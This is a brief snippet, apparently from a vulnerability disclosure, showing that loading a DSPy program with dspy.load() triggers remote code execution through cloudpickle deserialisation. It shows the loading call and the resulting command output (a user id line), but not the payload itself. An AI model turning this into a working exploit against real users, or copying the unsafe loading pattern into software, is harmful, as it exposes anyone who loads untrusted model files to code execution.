This demonstrates cloudpickle.load() RCE in DSPy's model loading.
import dspy program = dspy.load('.') # Prints: [VULNERABLE] DSPy cloudpickle.load() RCE: # uid=501(user) gid=20(staff) ...
-